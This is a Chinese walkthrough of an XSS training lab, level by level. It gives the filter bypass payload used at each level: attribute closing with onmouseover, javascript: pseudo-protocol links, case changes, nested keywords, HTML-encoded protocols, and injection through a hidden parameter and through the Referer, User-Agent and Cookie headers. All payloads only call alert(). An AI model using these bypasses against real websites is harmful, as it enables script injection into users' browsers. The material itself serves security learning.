第一關(guān)
無過濾,直接使用<script>alert(1)</script>

第二關(guān)
用'';!--"<XSS>=&{()}進行測試發(fā)現(xiàn)有兩個輸出點,第一個輸出點進行了html實體化。

可以看出只是將單引號變?yōu)榱穗p引號。閉合后添加新屬性:
" onmouseover="alert(1)
第五關(guān)
可以看出破壞了onmouseover標簽,但輸出點2沒有進行任何過濾。

閉合input標簽后后用a標簽和javascript 偽協(xié)議繞過。
"><a href=javascript:alert(2)>
第六關(guān)

可以看出herf也被破壞了,但測試發(fā)現(xiàn)通過修改大小寫可以繞過(on*標簽不可以)
" ><a hRef=javascript:alert(2)>
第七關(guān)
可以看出是將關(guān)鍵詞過濾為空,考慮嵌套關(guān)鍵詞
" ><scripscriptt>alert(1)</scriscriptpt>
第八關(guān)
輸出點在a標簽的href屬性中且引號被過濾無法進行閉合,考慮使用javascript偽協(xié)議,但關(guān)鍵詞被過濾,因為在href屬性中,所以用html編碼繞過。
javascript:alert(2)
第九關(guān)
友情鏈接必須包含http://,javascript被過濾,將偽協(xié)議代碼html編碼并在后面注釋上http://
javascript:alert(2)//http://
第十關(guān)
這關(guān)就有點坑了,一開始那個輸入點沒人任何辦法繞過,發(fā)現(xiàn)有隱藏的輸入點

測試后發(fā)現(xiàn)t_sort參數(shù)有輸出點且無過濾。
keyword=1&t_sort=1" onmouseover='alert(1)'(如果沒有將input改為可見可以使用其他on*事件)
第十一關(guān)
進入時發(fā)現(xiàn)有一個隱藏的input的值為第十關(guān)的url,可以確定為refer,測試其他輸入點均被過濾且無法繞過,嘗試修改Referer為xss語句,成功繞過
Referer: " onmouseover="alert(1)
第十二關(guān)
這次又顯示瀏覽器信息,這次修改User-Agent
User-Agent: " onmouseover="alert(2)
第十三關(guān)
這次的輸入點到了cookie中,修改cookie
Cookie: user=" onmouseover="alert(1);
第十四關(guān)
這關(guān)好像已經(jīng)失效了,是關(guān)于exif的